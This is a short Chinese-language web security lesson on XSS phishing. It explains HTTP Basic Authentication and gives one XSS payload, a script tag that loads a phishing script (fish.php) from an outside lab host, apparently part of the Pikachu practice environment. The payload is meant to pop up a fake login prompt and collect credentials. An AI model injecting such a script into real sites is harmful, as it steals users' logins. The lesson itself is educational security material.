风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击

风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击

XSS钓鱼攻击

HTTP Basic Authentication认证

大家在登录网站的时候,大部分时候是通过一个表单提交登录信息。

但是有时候浏览器会弹出一个登录验证的对话框,如下图,这就是使用HTTP基本认证。

在你访问一个需要HTTP Basic Authentication的URL的时候,如果你没有提供用户名和密码,服务器就会返回401,如果你直接在浏览器中打开,浏览器会提示你输入用户名和密码,也就是上面的图示。

要在发送请求的时候添加HTTP Basic Authentication认证信息到请求中,有两种方法:

一是在请求头中添加Authorization: Authorization: "Basic 用户名和密码的base64加密字符串" 。

二是在url中添加用户名和密码。

<script src="http://fx.com/pikachu/pkxss/xfish/fish.php"></script>

参考:http://blog.evalshell.com/2020/12/20/风炫安全web安全学习第二十四节课-利用xss钓鱼攻击/

上一篇:JavaWeb学习记录(四)——日期和数字的格式转换


下一篇:javascript的历史和入门